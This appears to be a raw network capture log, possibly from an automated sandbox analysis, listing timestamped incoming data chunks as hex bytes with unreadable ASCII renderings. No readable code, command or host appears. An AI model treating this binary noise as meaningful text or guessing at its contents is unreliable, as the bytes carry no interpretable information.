                                                                                                        2022-09-29 12:45:08 UTC706INData Raw: d3 e8 bb 24 8e f5 8a e1 3d cb 76 c8 f2 e8 a8 d7 25 e2 4c 09 4a ea fe 7b 03 31 32 30 a1 eb 9e 30 07 dc 62 14 e5 ae e8 1b cf b0 b7 9d 9e 36 15 47 9b 61 30 45 ad 52 eb 36 8c 12 62 37 23 77 9d 2b 5b 5d 30 2e 66 45 dc 82 54 b4 9f 25 0a 38 5c c7 1d 53 a7 a9 77 6c 83 be fe b8 44 29 da f2 53 f8 36 04 92 a3 8e 40 e1 ec cb fa d4 93 45 f0 ff 4a ee 63 d8 33 55 32 86 d0 f3 31 01 03 2e c0 c8 f7 44 87 17 f6 77 a0 ac fa 44 36 04 de 37 88 f2 00 78 86 35 f4 f8 e5 6b c3 e6 6c 6b 8a 05 d1 08 24 8f 37 16 71 80 b4 39 95 7a 03 0b 3f 78 4c 7a a2 e2 60 3a 37 03 8f 31 74 70 4a fd 2a 4c dd d2 4d d2 b2 07 8d 86 c5 a3 6f 4b 9c ca 33 c4 00 d9 92 3a 35 96 e8 9a bb c4 e5 47 32 0c de da 22 5b 09 fe 51 51 ad 1c 39 c0 8b 72 da 41 34 da 40 98 40 f7 8a 48 6f 7d 74 ee c3 8b de 61 de be 5c 1b
                                                                                                        Data Ascii: $=v%LJ{1200b6Ga0ER6b7#w+[]0.fET%8\SwlD)S6@EJc3U21.DwD67x5klk$7q9z?xLz`:71tpJ*LMoK3:5G2"[QQ9rA4@@Ho}ta\
                                                                                                        2022-09-29 12:45:08 UTC708INData Raw: 4c 6e 17 60 26 d6 b8 2e bc b8 0d 14 1e 68 07 de cf 2f 81 06 53 f1 d8 f3 11 de 51 ea 61 eb 05 13 7d 9a 74 47 4b 9b 5b 9b cb da 88 a7 70 b3 99 c4 db 0a 4d f6 1f 23 3f a4 4a c8 c6 87 5a d7 14 bf 84 8c e3 c2 2f 0d 54 60 01 d3 e3 25 94 bb e1 fa 9c 24 8e 24 b2 85 0f 8c 1c bf dd aa 8f 92 76 d5 10 55 e9 85 e7 3f a6 59 e6 50 ea 58 74 3e e9 36 81 7f 64 fa 3d 2d 78 01 5f 76 dc a2 aa 15 e9 21 58 84 62 54 a9 c2 c3 4f 8d 5e 92 7c f6 fc 53 88 79 83 10 94 e5 97 f1 da 66 01 50 66 eb e7 cf 9d da 9e 12 df 93 e5 d7 22 f3 de b2 12 d0 91 6d 2a 62 e1 b2 d3 0b 75 44 54 06 5e aa 8c 78 07 bc 88 1d a0 78 d6 16 59 a0 68 f6 5c ed 3e cf 43 03 b9 49 7f 13 40 00 25 6e 91 23 17 61 91 78 8e ed 54 1a d4 f0 ae 13 d1 99 ef 2a 27 e5 c3 89 c7 db 69 dc 5e ab ab 84 46 e2 f8 0d a2 33 db c1 f2 18
                                                                                                        Data Ascii: Ln`&.h/SQa}tGK[pM#?JZ/T`%$$vU?YPXt>6d=-x_v!XbTO^|SyfPf"m*buDT^xxYh\>CI@%n#axT*'i^F3
                                                                                                        2022-09-29 12:45:08 UTC709INData Raw: 63 e3 68 e4 c6 9e e2 a3 8a e6 d7 62 10 67 57 ba e7 b9 c7 5a ab d4 1e 61 6b 7a e6 9e 78 da ba 6b 52 b8 00 21 07 0a c2 7d 23 1e da b9 80 18 e8 90 73 f1 40 9a b3 d6 8d cb fb 2b 97 be 02 7f b4 d3 39 95 af f4 72 63 1e f6 a2 da 49 87 cb 47 ce 05 7e c2 a2 bb 0f b0 5a d1 c7 0a a9 da 0e 24 29 3f 0a 03 eb cb 00 ef 15 6f 51 b5 c1 80 75 05 95 a1 e3 df e0 2d d6 cb 6a ab 53 f8 c4 8f 5b 90 16 7d c9 24 31 2f 8e 42 1f dc 33 f6 58 5f 96 e6 28 f9 68 63 11 67 1c 83 37 a5 ad 2e bb a0 e0 7c 62 ef 1d 2a 07 18 7a d4 d0 f0 41 97 89 fe 2e 6b 2f 72 9d 4d ce 6e 94 a6 61 a8 78 87 d8 1b e4 6c b5 ce 4b b5 4f ce 55 4f c4 7c 10 59 6b de 43 3d 1d 4d 6f 20 d5 10 92 32 d3 d0 b1 1e 16 fd 92 52 22 75 ac 25 04 23 30 66 49 aa 72 ab 57 e1 17 ac aa b6 02 5a 01 0d bf bc ee 23 7f e9 39 c4 b9 8c 4a
                                                                                                        Data Ascii: chbgWZakzxkR!}#s@+9rcIG~Z$)?oQu-jS[}$1/B3X_(hcg7.|b*zA.k/rMnaxlKOUO|YkC=Mo 2R"u%#0fIrWZ#9J
                                                                                                        2022-09-29 12:45:08 UTC710INData Raw: c0 16 26 bf 4d d1 e2 51 32 8a 2b 03 c7 b7 f9 d1 0e 3d 2e aa ef de a2 03 b0 5f d8 33 90 de e8 7d 7b fc 48 a0 da c8 f5 c6 86 d8 96 eb 2b 47 41 91 97 3f 56 0f 04 69 e4 bc a0 ad a2 df 3a 88 d6 91 74 0d 11 63 75 81 a5 a3 9f 28 0a 78 4b bf a8 30 80 42 bd cd 1f 1a 01 5b a2 14 9c 88 c1 a5 1e 59 09 b5 4b da 67 69 01 ca b1 f9 a0 91 aa 84 41 bd 2c b6 d1 46 be 13 2d 8d 9f 2c 4b ef 0c ae 79 6c d4 de d0 be 9f 45 8f e9 ef 5e 26 fb ad 99 0a 25 df b8 fc 04 3a 36 81 83 80 09 94 dd dd 8c 1d e1 d4 51 ce 78 3c 64 d6 04 0f ee dd 54 ac 34 ba c5 3c eb ee 1f 80 3a 91 8f ea 5a 85 94 67 c9 bf 4f fc 1f 6e 48 dc 90 bc 11 9f 39 86 d0 a1 f4 13 f9 f8 86 94 63 97 b2 0c f9 ef 6d b4 7e 94 fe fe 0d 2a 15 d9 58 f9 f2 c4 b8 6d af 6a 14 b8 9a 0b b7 09 73 1b 41 e8 53 d5 d7 5e 83 a4 07 00 5c e2
                                                                                                        Data Ascii: &MQ2+=._3}{H+GA?Vi:tcu(xK0B[YKgiA,F-,KylE^&%:6Qx<dT4<:ZgOnH9cm~*XmjsAS^\
                                                                                                        2022-09-29 12:45:08 UTC712INData Raw: 4d 75 31 64 cd 2b 67 52 d1 94 ed a5 1e 34 cb 3d 1d 89 90 b0 dd 42 2c 1b e6 9d 8b 1d 63 62 0e f2 67 1e d0 72 19 41 97 fb a7 32 20 81 12 5d 2d fa 6e cb 7a ce 85 ac 3c 78 01 ba 59 39 79 9b c6 6b b5 68 82 d7 4b 64 75 6e 8c fb 80 3a 9e 4a c8 df 93 cb 87 51 79 6f a1 b0 34 77 4a b3 a6 6e 3b 55 a3 7d 93 c7 64 35 e9 33 1c 52 35 db c6 e3 c5 15 c0 24 df 09 5c 7c 94 f4 8f ae d9 c8 a9 5f c6 8c 5c 83 e1 17 3e 85 67 c4 a6 cc f6 cd 8a ad db 36 87 25 5f ed 93 48 ab 2d 8c 2a ee e5 21 c4 f0 d8 89 33 41 9a 16 14 69 b3 2d e5 06 c4 65 37 f7 ef 13 b7 a2 bd 1c 59 97 cb a2 c1 68 7b 4f d3 2d b0 d5 13 06 53 5a 4d a8 55 ad d3 90 80 6f 0d 3e 5f 60 fd f5 b1 61 09 0d 57 ee f7 53 d6 9c 37 22 54 29 95 cb 7e dd 06 85 b0 a5 a6 8a 63 d3 91 3b 0e 87 53 7c 5d 33 ba 80 3a ed 7f fb b4 dd 5e 27
                                                                                                        Data Ascii: Mu1d+gR4=B,cbgrA2 ]-nz<xY9ykhKdun:JQyo4wJn;U}d53R5$\|_\>g6%_H-*!3Ai-e7Yh{O-SZMUo>_`aWS7"T)~c;S|]3:^'
                                                                                                        2022-09-29 12:45:08 UTC713INData Raw: 12 e0 6c 86 d1 e9 5a 55 44 35 21 e0 80 b1 1d da 3e f3 c1 e9 a1 0e 23 54 85 3c 8b 40 73 1f 4e 6e 31 07 39 c7 76 fb 98 c0 66 2b 8e f3 6f 3d 5b 84 4c a0 0d c8 94 ea d4 08 68 66 34 01 8f fc 37 4f 91 24 a2 32 4d b0 42 1f 91 d9 60 ed 91 9d ef 2e 97 a6 64 07 b2 66 e8 68 64 a1 27 b1 5f cd 33 6c cf 77 e6 bb 13 03 b3 ea 39 4e d7 4b 15 38 cb b6 71 64 45 43 c9 c4 b1 13 cd bf d9 e4 a5 6d 8b 19 d6 a2 77 ff 04 64 f0 b9 e7 9c 5b 3a 9b 85 05 c0 0a 93 20 e2 99 1e 84 a8 e0 b3 57 8b 06 01 1e 6b 9f b0 84 f1 cf c5 d1 2a 19 a4 91 e7 45 36 b4 1c 7f c0 99 0d 69 e0 e0 c1 96 1e e1 69 7a 53 b4 af b9 5b 6b 8a c3 ee e0 91 9b 0b 20 d4 99 50 13 19 06 0a d8 02 73 f6 e2 4d 79 51 26 ec ff 26 ed 51 23 46 c0 e3 74 ad ce 1c ae be f3 ca 16 ef e2 d4 55 c6 bc 92 ad 27 56 a1 9d 91 f0 b2 4c 09 0b
                                                                                                        Data Ascii: lZUD5!>#T<@sNn19vf+o=[Lhf47O$2MB`.dfhd'_3lw9NK8qdECmwd[: Wk*E6iizS[k PsMyQ&&Q#FtU'VL
                                                                                                        2022-09-29 12:45:08 UTC714INData Raw: 46 d1 b9 9e 1a d4 b4 27 0d 2c b8 89 e0 00 8e 49 51 66 fb 18 bb b8 a8 d9 9f bd f6 ce a7 24 cc a1 ae 02 a0 98 b0 36 18 85 f6 bd 70 2f 7c 15 b8 7f 45 c0 89 eb dc 8a 2c 75 81 c5 9f 71 52 34 73 03 9c 32 ed 98 68 a6 bb a5 42 90 67 f2 2e 34 74 6a 29 82 60 b7 61 f6 5f 5b 7c 4d 19 75 33 ec 52 f8 eb 3a f4 ef 3a 56 2f 93 1d e3 b6 00 80 2d 79 15 c7 a6 95 e4 25 3c f8 f2 08 e8 46 9d 5e 01 1a 0f a8 a2 fc 5f b2 8a 7a 7a 35 3c 8c cc fe 72 c5 51 61 f5 cb 7a c7 79 39 49 3d c4 3f 34 73 a9 d0 12 78 c1 23 65 9b 86 ca 78 aa 54 b4 23 dd c0 7e 8e 07 21 d7 b3 7d d3 aa 46 7c 95 54 a5 51 ae 3d 30 04 3b 18 27 21 70 85 14 04 ac a3 90 8c 85 d7 81 aa 2c e5 24 a4 18 7f f0 45 33 27 df e3 9b 94 e8 05 f2 51 9f 21 c8 ee b8 40 73 68 15 72 6f f8 42 1b 38 a5 ca 66 ab 32 1d 91 b7 2d 4a f1 01 bc
                                                                                                        Data Ascii: F',IQf$6p/|E,uqR4s2hBg.4tj)`a_[|Mu3R::V/-y%<F^_zz5<rQazy9I=?4sx#exT#~!}F|TQ=0;'!p,$E3'Q!@shroB8f2-J
                                                                                                        2022-09-29 12:45:08 UTC716INData Raw: f5 17 48 83 11 6c 16 33 8c 94 48 d1 b4 fe 32 cc a4 83 bc 13 76 af 2d 2c 8f f9 3d bb 08 71 85 5e 1a 07 23 ef dd e1 3d 9e 6d 91 36 9f b9 b7 f2 48 49 70 1e 07 4b 4b b1 00 a1 48 71 45 a8 96 0b 8c 24 8a e2 40 c5 df 95 16 ca 89 da 22 d2 43 74 38 31 5e b1 4e 84 03 42 87 03 bc 4e 92 37 93 ab 84 a2 43 e3 f1 e1 6a ed 31 be 64 cc e4 03 33 1b b1 36 a0 d9 d1 70 d2 c7 3f 81 0d 14 3b 45 48 62 64 e6 cb 7b 47 3c 44 d0 63 27 b4 9f ac 3c 18 04 3c ce 7a 8c 8b e9 16 b0 e6 3d 27 1c 2a cb 83 d1 96 d5 1b 6e 1b b4 4c a7 7d 3a 40 8e ae bd 6c f2 c1 62 ba 7a af 33 3e ef 05 4c 45 58 3a 1e ec fb 49 ec 38 fb 04 5c 07 ff 8e eb fb 6b 42 72 24 e1 c3 c1 93 14 fe 47 ef 83 2b be 72 51 ec 1e f7 8e af 9a e9 3d a5 e5 21 df 81 34 1d 7f a4 6a 6c 3e 2e 18 e3 1e e8 46 5f 90 1d ef 19 46 5f 03 11 ae
                                                                                                        Data Ascii: Hl3H2v-,=q^#=m6HIpKKHqE$@"Ct81^NBN7Cj1d36p?;EHbd{G<Dc'<<z='*nL}:@lbz3>LEX:I8\kBr$G+rQ=!4jl>.F_F_
                                                                                                        2022-09-29 12:45:08 UTC716INData Raw: 98 40 fb 1a d8 c9 a3 15 40 64 53 58 11 81 e2 ca ad 34 4a 9d 0c a3 b6 8d 48 24 2b b8 db e3 2a 64 8a 83 ad f2 b8 a7 1c f6 70 18 a4 77 d4 90 d2 76 02 de 87 de 17 86 09 a7 24 9f 4e 7e 54 bd 69 72 a5 8a cb 22 c3 80 db 84 2d 94 8f e5 13 0d 4e 1e 2d 47 5b 78 c2 e6 82 ab 10 97 cd 1d ea 91 be 43 80 e3 1b 49 04 32 b3 fd 80 a9 4f 9f 2b 21 bb 25 15 1f 35 70 58 8b 4c 07 f7 4e ae b3 4c 9d 48 bb 91 2d 7d 35 33 d1 57 69 1f fd a6 cc db 0c bc b1 f9 b5 76 0d 04 f0 5e fc ad e2 04 c3 d5 ab 5a 10 3a cb 6c 95 46 b7 ce af e3 10 71 8d f8 48 c0 81 13 8a 4a 69 64 d0 57 bd ca 40 b4 38 3c 16 8d e8 c4 4b ea 6d a3 76 a5 fe 46 83 a5 f1 ae 32 f2 9c 7c 3a 9f c9 0e c8 42 c6 da 81 ec 06 b0 85 19 fb 5a 29 2b d0 93 9b 70 f0 2f 75 61 be ed 07 6a 19 0b 7f 55 fe f8 40 5d 8c 15 0a b2 19 90 3f 7c
                                                                                                        Data Ascii: @@dSX4JH$+*dpwv$N~Tir"-N-G[xCI2O+!%5pXLNLH-}53Wiv^Z:lFqHJidW@8<KmvF2|:BZ)+p/uajU@]?|
                                                                                                        2022-09-29 12:45:08 UTC732INData Raw: 51 3b 17 d1 c6 ce 40 47 99 39 da a3 d1 7b 8e 27 69 88 c2 de 38 91 14 44 b8 e8 72 b8 29 9b c7 8a 58 e9 3c 79 09 9d db d8 de 72 e2 05 29 6c ad 3e c6 70 06 af 35 e2 b8 cb aa 1a 8a 23 c1 c5 ac 64 0b 89 68 49 db 1b 40 97 7b ba c5 da 82 b0 96 ba 3d 3f cc 3c 92 8e 20 39 fc e2 c8 70 12 6a 89 c6 fd 70 bb e7 cf 47 44 00 d2 80 a3 b1 7a 26 38 ff af 8b 0f 50 4b f4 dc 14 ea 73 d7 64 5c 9a df 1c f6 ff cd 2f 13 17 f8 61 eb c1 3e 6d fc 19 81 3d 86 11 ff d0 d8 f4 f8 07 1b 93 fb 34 5c 85 ed 78 39 e8 23 43 31 34 b8 8e c7 b0 34 3d 39 1c 36 71 d1 23 51 2b 3f 51 d1 93 77 ea 23 cb c1 19 1d 3e 34 fb 48 b4 d9 12 9e 85 5f b9 7f b5 63 0b 25 7d a4 f7 f7 7e 8d e8 ee 7f 97 91 58 5e cb 29 bf 55 b7 57 24 69 f7 33 2c 62 5b fe 99 de 85 17 ad 69 ce ef cf 8f 3a 8c c7 f6 9e 1f 8d 0a 16 37 ec
                                                                                                        Data Ascii: Q;@G9{'i8Dr)X<yr)l>p5#dhI@{=?< 9pjpGDz&8PKsd\/a>m=4\x9#C144=96q#Q+?Qw#>4H_c%}~X^)UW$i3,b[i:7
                                                                                                        2022-09-29 12:45:08 UTC748INData Raw: 21 8e 91 a8 67 92 be 7d 08 74 8a b7 12 b0 a9 a1 39 bb 1b fc 89 65 cb 79 62 ef 1b 71 2e ab 4c 22 f7 db 2a ba 3c 42 cc 87 bf 37 cc 92 31 21 bb 0e dd 89 4f 19 bc 54 02 a9 19 22 56 e8 dd c2 3c 39 8c e7 22 0f 92 cf 3b 9c 32 97 fd 14 c8 7d 5b b2 e3 a1 43 c8 06 b0 ee 8a 03 55 a6 21 f2 d3 0c 4f 5a 5c ed 1b bb b3 1b b2 ef ca fb ad 3b 82 25 aa ee 2c 15 94 3d 4a 24 b8 21 76 90 b7 9a ae d6 aa cf b5 7c 3a 2e 92 38 9c cb 1d 27 71 5f eb 38 16 15 08 9c 9b 86 b1 ca 9b 11 b1 05 79 69 0c be d2 f0 6f 93 ed 1c 4d 69 7b d0 87 2c 37 84 0c 0e c6 af 31 62 4c b5 ab 7b db 24 50 43 03 19 a7 b7 f8 12 1a 7c 16 b0 09 95 34 0b fd 6c d2 87 b3 36 cd c8 11 2d 8a a6 f2 c7 65 34 df 8b 08 fe 71 82 42 f7 00 67 ae a1 40 95 22 f8 e9 84 c8 23 79 0f e5 1c d2 aa c9 69 a5 6b 66 3f 9f 14 c3 af 2f 56
                                                                                                        Data Ascii: !g}t9eybq.L"*<B71!OT"V<9";2}[CU!OZ\;%,=J$!v|:.8'q_8yioMi{,71bL{$PC|4l6-e4qBg@"#yikf?/V
                                                                                                        2022-09-29 12:45:08 UTC764INData Raw: e8 78 09 62 5e 9e 38 7d f5 a0 90 8b 43 3a c4 59 e1 b5 12 60 52 db c8 26 a6 e9 39 88 85 dc 2d 71 85 48 d6 eb e6 23 fe 3a 47 b1 d6 ad 87 91 a4 e0 6e 00 62 4a ca 74 a6 85 07 5f 3d 1f 0f c3 a9 84 2a ea d1 33 95 af ed f4 c8 7c 32 b5 e0 65 43 3c d8 a8 0e 99 5b f5 bd c7 8f 1a ab 06 02 c4 5d a0 f9 9b 99 f3 fd 34 f2 e8 66 3d d8 08 f7 f4 14 de a7 e8 7c 9f e3 d5 3c 22 a1 8a 86 c9 5b ba 71 b2 b7 f9 db 3f 31 2a 6f fe 19 51 a9 45 09 7f 60 59 34 ed 2c 6d 2e a9 47 ac 3f fa 4d 04 f5 d3 2e 4b 56 82 42 7e 52 a3 69 aa 71 a9 9b 8a 32 71 dd 16 79 6a 56 b2 f3 f7 9a b7 22 c4 b1 4c 2a 27 3e 8e 2e b4 d2 34 41 0e b6 a6 10 c5 98 e0 e9 82 9b 98 7b 18 4a a6 0d 47 d9 12 42 b3 ce b5 56 50 40 8b 25 00 f8 20 9f b0 72 32 99 23 0e c0 25 5e db d7 53 8f dd 1f 33 a0 46 7b 3c 93 a5 30 51 da 28
                                                                                                        Data Ascii: xb^8}C:Y`R&9-qH#:GnbJt_=*3|2eC<[]4f=|<"[q?1*oQE`Y4,m.G?M.KVB~Riq2qyjV"L*'>.4A{JGBVP@% r2#%^S3F{<0Q(
                                                                                                        2022-09-29 12:45:08 UTC780INData Raw: 30 10 05 7e 64 0a f8 f5 c1 67 5b 9e ae 27 91 1f d5 ae b9 ef e1 5d a0 da c9 0e fe c7 95 fe 32 7e 96 c0 df 02 7f 2e 1c 21 19 e6 6e 7d 66 a2 6f e5 c6 31 cb c4 85 e6 b0 e5 0e a5 ba a6 2f a1 43 7e 0b 54 d2 61 55 80 0c ea d8 86 b6 a1 49 63 df be a3 d7 7a 98 f8 29 aa 2d f2 76 7c 0b 1b bb f4 e4 e6 f1 83 ec 0b 6f f4 7a 6a 04 1e a6 30 f4 69 c7 2c a5 3a 80 eb d4 1c 6a 0d eb bb 8c 58 bf 33 84 82 90 50 37 a6 37 d0 e2 bf 1f b4 a0 3d a2 35 fe 18 50 ad 05 36 8b f4 fb 34 cb 80 a4 02 ce 76 09 fe c9 40 ad 8e 5b 2d 35 9a 83 43 fe 0d 87 ff 26 00 d4 7f 57 b3 c2 6e 30 ef 51 11 d7 f4 4b 51 09 71 22 ff d5 eb 61 27 31 4b ca c3 ff 7d 20 5a e6 af ad 7b fc a8 97 59 be ed bd 06 8d cb 47 f0 13 ba 4a 1c b5 12 72 c7 d7 16 00 de 4d 58 eb ea 90 8d 73 b7 8b ad d7 31 d1 bb 95 27 33 d4 b2 95
                                                                                                        Data Ascii: 0~dg[']2~.!n}fo1/C~TaUIcz)-v|ozj0i,:jX3P77=5P64v@[-5C&Wn0QKQq"a'1K} Z{YGJrMXs1'3
                                                                                                        2022-09-29 12:45:08 UTC796INData Raw: 92 64 f9 eb 4a cf 3a 34 a4 57 e3 80 a5 3b 12 a5 66 8b ce b1 85 9d d3 6f 83 bd e8 59 54 6a bb 52 62 d6 d1 0c c5 9d 29 c1 50 f4 a4 4c 07 5e c7 1f ee 44 c6 ba f6 1f df 08 9e d3 dd fd e7 75 12 a8 66 49 08 39 cd f6 5f e6 57 a1 97 1b 01 bd c2 06 ff 2f 1e f3 ec f7 1a 91 c7 14 bd 37 56 62 ee 8f 97 cd 23 56 dd 0e 02 8b 45 02 09 8f f9 72 0d e7 80 8b 61 a0 53 b3 a1 67 22 a8 b1 e2 03 d4 a2 96 24 e8 db 52 0b 62 28 c7 55 23 0f ed 96 02 8e 52 d6 77 51 8c 4a e7 b0 a0 0a d6 51 ac 72 07 c1 d6 18 8e 88 5e 8b ad 1f b5 4e cb 07 1b ad 7e 61 20 42 4e 08 28 44 2f 52 80 1f 69 5a 39 c6 6f bb 8e 27 86 94 7d 3e cf d5 0e 5c 0d a5 c5 60 dc aa 1d 72 50 73 12 96 ef df 2e 96 98 18 27 d3 1c 17 94 cf 11 b3 9d cf 03 29 4b 70 65 7c 64 0b 2b 56 96 40 93 e7 98 6b 5d 58 f3 0c e1 9e fc d2 9c 1d
                                                                                                        Data Ascii: dJ:4W;foYTjRb)PL^DufI9_W/7Vb#VEraSg"$Rb(U#RwQJQr^N~a BN(D/RiZ9o'}>\`rPs.')Kpe|d+V@k]X
                                                                                                        2022-09-29 12:45:08 UTC812INData Raw: 67 0b 19 d2 f6 5f 01 a2 23 bd 79 71 d9 51 c5 66 a3 db 61 58 c5 b5 84 91 db e6 4c 5f 1f a6 01 62 b5 4d 19 cb ac a4 96 05 56 eb 21 19 ca 05 7c 36 a0 2c 19 f9 c6 34 79 a7 b9 3c bf e3 98 1c 55 23 6a 3b b2 c9 dc 49 2a bb 2b 45 e7 55 1c 92 35 1e 80 b0 ee 62 fc 69 b7 35 d9 62 0e fb 2f e2 a2 f7 bf 68 ec 11 ef be 22 55 ba f5 aa ef 8c 51 ea 69 31 a7 e2 5d 52 7e 4c 5f a1 97 01 ae 20 2a 17 a8 21 db 16 30 ef c6 ab c4 d3 b2 1a 79 78 79 9e aa c4 e4 00 92 fa 28 68 de e8 80 f7 92 0f c2 c3 8f 76 3e 51 2e 0b 9c 6a cb c6 d4 6a 2a c2 ff 57 d3 ab ea 35 ef 57 df 8e df b8 12 55 b6 d9 46 ec 08 2a cb 14 c9 5b 14 f2 af 4e a8 67 20 66 49 17 4b 2e 86 ce 1e 93 de 14 8e 83 4d ab f1 38 69 30 8d 31 65 58 41 bc 90 f1 20 4f ed d0 93 7f a1 ee e0 13 d9 a8 d6 87 e5 30 3b b8 84 b1 7c e8 c5 23
                                                                                                        Data Ascii: g_#yqQfaXL_bMV!|6,4y<U#j;I*+EU5bi5b/h"UQi1]R~L_ *!0yxy(hv>Q.jj*W5WUF*[Ng fIK.M8i01eXA O0;|#
                                                                                                        2022-09-29 12:45:08 UTC828INData Raw: 20 07 65 82 ef b6 c3 26 8a 95 c8 ce 62 ca 7b c0 24 f5 91 07 80 47 91 95 0a 63 7d 18 ca 6f 2a ea bb 08 ba 6c 25 4d 50 0d 36 e3 fe bb 25 5f 53 62 ef 69 d9 76 00 66 a9 60 ca ed 4f 9c cb 74 e8 d4 3a 4a 2d 29 3e 59 ef 00 0c 9d 7b 9e eb 1f db 61 ef e7 f6 79 2b 17 7b f8 d1 9a 78 57 52 55 cf e6 80 41 70 c2 67 18 5c 16 f2 81 20 79 b5 65 df 54 2a 01 cb 3e 65 c1 81 a7 58 a2 78 0d 31 23 96 06 0a 77 2e 32 f7 28 9e 00 a0 21 1b 27 55 63 51 dd 6d 53 c2 ae 3c f6 72 45 75 f7 17 94 70 15 85 eb a3 47 3f e0 dc 4a c9 ad b4 51 d5 5a 64 08 26 00 6a 46 bd 91 7f 26 68 53 e9 21 ba 45 63 57 4f 06 4f 8b f7 31 4c ab cf 38 dc 49 1a 79 dd a4 ff a2 27 5c ec af f5 76 ea 32 bd 83 94 f9 c7 38 b5 52 06 bc 13 36 46 64 91 40 05 7d 1e e5 31 ab e8 34 57 17 1d 6e e6 0f f5 70 b2 f9 30 3d 1e 4e 5a
                                                                                                        Data Ascii: e&b{$Gc}o*l%MP6%_Sbivf`Ot:J-)>Y{ay+{xWRUApg\ yeT*>eXx1#w.2(!'UcQmS<rEupG?JQZd&jF&hS!EcWOO1L8Iy'\v28R6Fd@}14Wnp0=NZ
                                                                                                        2022-09-29 12:45:08 UTC844INData Raw: d0 e4 53 5f 9c b4 59 61 54 26 36 c1 e0 f4 af 77 d8 1b e0 16 62 41 ea 11 20 7b 0b 1e 29 22 0e 39 31 d7 f9 ac e8 3b aa 3f 02 c1 0d d9 82 8b 34 bd a7 cd 71 19 1b a5 0a 72 f1 23 83 3a a2 a0 73 17 cb ef c9 ea 86 9b 87 72 26 f6 c1 13 00 52 a1 7a 5e 92 93 ac 86 bc a4 a1 ca e3 88 a8 a7 2e bd 62 40 89 83 02 79 11 73 2b d0 03 a9 8f 94 78 d0 fb 39 4c 1b 73 ee e4 37 1b da f6 bc c5 5f 8f 0a 11 ca 98 31 2d eb 9f 06 d0 72 ed 42 b1 e2 23 09 ee 51 19 74 8b a5 7e 7d 20 d2 f5 4a ed ab d7 b2 af 6e c0 5c da c2 7e d5 91 53 97 ce 4e e9 1a 88 d7 90 b4 6f 8c fb 89 2d 93 6a 56 28 b8 0d f5 86 c3 6b f4 d8 b7 22 cf 64 0c 76 6a ec 66 b6 21 c5 1f db 57 2f 1b cc 76 38 92 bb 04 fc 51 22 aa 4e 9f 5c bf 2a 38 85 cb cd 03 c9 01 85 c5 70 93 95 0d d3 73 70 5b 6d 9d 97 82 31 a1 da 02 54 cd 5d
                                                                                                        Data Ascii: S_YaT&6wbA {)"91;?4qr#:sr&Rz^.b@ys+x9Ls7_1-rB#Qt~} Jn\~SNo-jV(k"dvjf!W/v8Q"N\*8psp[m1T]
                                                                                                        2022-09-29 12:45:08 UTC860INData Raw: 23 ce 39 6c 23 6e 2e 6a 28 94 cb e6 16 51 1a 99 5f 79 ac 45 b9 e3 c5 21 0f 45 55 8e fd 4b 68 5d e8 5c 22 32 99 7f c9 87 57 a7 3c f0 df 6c aa 77 a3 04 f4 a4 77 e5 a8 c6 be 46 bd c3 15 5a ee 08 e8 b9 df ec f5 d8 b3 44 fb 98 d3 3a ae a8 ec b9 64 8c c5 30 2f 3d a8 9d ff 7c 00 be ab 9b 32 b5 13 d8 03 5f 0f 90 33 b5 75 23 7e d8 db 15 85 c8 a1 42 68 74 75 d1 8f d0 63 97 1b 75 ff 4c a0 54 3d 53 57 18 c9 95 b4 55 32 13 88 50 83 34 47 6f bb 2e 48 b2 13 52 35 32 19 09 d7 73 65 77 9b 71 92 53 a5 c8 d8 a0 3f 85 ba 1a 29 88 d7 6f 48 45 fb 61 e0 e4 b0 08 18 d2 97 c1 a0 4c 2d 84 03 da e8 9a ce 0b 12 6d d1 91 a9 33 8b 2a 0e 62 cc d3 ac 9d 87 48 cf f5 3a 6b 83 10 a7 e3 bb 93 89 5b d1 62 20 b1 2c 53 ba d8 a5 9d f2 64 06 aa db ed bc ff d4 2e 7c 59 b0 9b e5 c9 40 aa f7 7d 74
                                                                                                        Data Ascii: #9l#n.j(Q_yE!EUKh]\"2W<lwwFZD:d0/=|2_3u#~BhtucuLT=SWU2P4Go.HR52sewqS?)oHEaL-m3*bH:k[b ,Sd.|Y@}t
                                                                                                        2022-09-29 12:45:08 UTC876INData Raw: 25 07 ee 34 33 31 fa 6c 7d a0 6b bc 6a d6 11 8c 9e 82 19 95 d0 06 df 22 a8 5c 08 49 d2 8b d5 19 c2 8c 0d a2 5a 7a c0 78 1a ee de 7a 27 d3 ad 07 fd c4 dc 32 7d 0f d1 04 90 79 c1 c0 19 3b df b5 06 69 e9 33 0b 62 be d1 70 96 31 aa 2b 16 e6 90 44 e6 d2 32 77 fa b0 79 60 e1 9f 61 fd d4 23 39 85 a0 d3 57 b0 80 db e9 ee 18 6a e8 09 41 22 fa f0 8a 42 94 b2 13 5b c0 98 22 4a 77 15 e1 56 05 d4 6b 2e 90 76 06 a6 b4 83 65 be b4 23 48 36 70 fe 96 f9 7e a1 71 f2 c2 76 79 8d 51 f1 35 fe 7e b7 ea 48 40 ef ef 22 a0 6a 24 76 6f 97 c1 a1 aa ae 38 20 ac fa f8 76 17 5a 7f 80 0c ec bb f8 20 be 12 49 cf a1 68 e3 2c 90 1f 2e 43 98 c2 84 9a c3 33 0b ba 9e 8d d3 10 a0 31 92 b9 2e 48 57 f2 3a 41 bd e0 a3 62 ee 68 b6 c1 c0 36 6c 4f e6 cd d9 5d 82 c4 95 f2 f2 8e 01 3f a5 65 aa 89 bc
                                                                                                        Data Ascii: %431l}kj"\IZzxz'2}y;i3bp1+D2wy`a#9WjA"B["JwVk.ve#H6p~qvyQ5~H@"j$vo8 vZ Ih,.C31.HW:Abh6lO]?e
                                                                                                        2022-09-29 12:45:08 UTC892INData Raw: 3b 83 43 7c c0 eb 31 ba a4 a1 ae df ae 75 3a c4 ff 70 58 8e 50 a1 8c 96 ab 83 09 d0 83 4c d9 b6 71 b5 dc 90 c1 5b a6 d0 08 ad 02 5a 87 36 56 6e 84 a1 8d 16 1c 94 9b c3 db 0c 1a f4 71 20 e8 27 17 63 10 ff ee eb e3 f2 65 2d d9 be d0 4b 7b 7d 29 da ef e1 42 37 3c a5 78 ac 52 1b f0 6a 91 6b 64 78 fc 70 a4 4f e8 05 0e 03 9d 16 5a c6 55 67 ea 85 fb 57 1b ae 66 bf 27 47 01 80 d8 bc 35 49 d3 47 0b a4 06 d2 af 85 87 97 cc ed a1 9b 5d 29 b5 6b ee 5d de ab 5c b0 8d 50 db 0c ff 6d 77 0f 60 ca da fc 62 53 69 d1 6e 24 67 51 2a ad 5b f8 b2 84 cc 9f be 50 6e b1 63 c7 f7 48 37 cf 18 f1 53 a8 49 b8 ee 57 35 c8 15 65 4b c2 04 0c 87 f2 ba 90 04 4d 72 